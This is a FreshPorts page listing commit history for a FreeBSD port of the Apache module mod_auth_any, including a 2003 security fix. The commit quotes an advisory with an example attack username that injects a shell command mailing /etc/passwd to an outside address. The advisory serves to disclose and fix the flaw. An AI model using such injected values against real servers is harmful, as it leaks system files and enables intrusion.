notbugAs an Amazon Associate I earn from qualifying purchases.
Want a good read? Try FreeBSD Mastery: Jails (IT Mastery Book 15)
Ukraine
NOTE: the WWW: line in pkg-descr was relocated to a WWW= line in Makefile. Each port in FreshPorts has a homepage link. Look for it right after the Description: on each port's home page.

Do I know someone who can pick up a server from 7401 E. Ben White Blvd. Austin TX?

The emphasis is on know, or recommended by someone I know. This is the original FreshPorts server, way past useful: RAID, 8GB RAM, etc. The drives need to be wiped and everything recycled.
non port: www/mod_auth_any/files/bash_single_quote_escape_string.c
SVNWeb

Number of commits found: 2

Mon, 6 Oct 2003
[ 13:00 edwin search for other commits by this committer ] Original commit 
[update orphand port] www/mod_auth_any: Update to 1.3.2 and take maintainership

        - update to 1.3.2
        - update WWW
        - take maintainership

PR:             ports/57413
Submitted by:   Clement Laforet <sheepkiller@cultdeadsheep.org>
Tue, 25 Mar 2003
[ 04:23 lioux search for other commits by this committer ] Original commit 
o Fix vulnerability that allows execution of arbitrary commands on
  the server with the uid of the apache process. Background [1]:

"The module accepts a username and password from the web client,
passes them to a user-space executable (using popen(3), which invokes
a shell) and waits for a response in order to authenticate the user.
The password is quoted on the popen() command line to avoid
interpretation of shell special chars, but the username is not.
Thus a malicious user can execute commands by supplying an appropriately
crafted username. (e.g. "foo&mail me@my.home</etc/passwd")

"The problem is easily fixed by adding quotes (and escaping any
quotes already present) to the username and password in the popen
command line."

o Fix this by adding a escaping function from [2]. Then, modifying
  this function appropriately with ideas from [3]. Apply the new
  escaping code to mod_auth_any.
o Bump PORTREVISION

Submitted by:   Security Officer (nectar),
                Red Hat Security Response Team <security@redhat.com> [1]
Obtained from:  mod_auth_any CVS [2],
                nalin@redhat.com [3]

Number of commits found: 2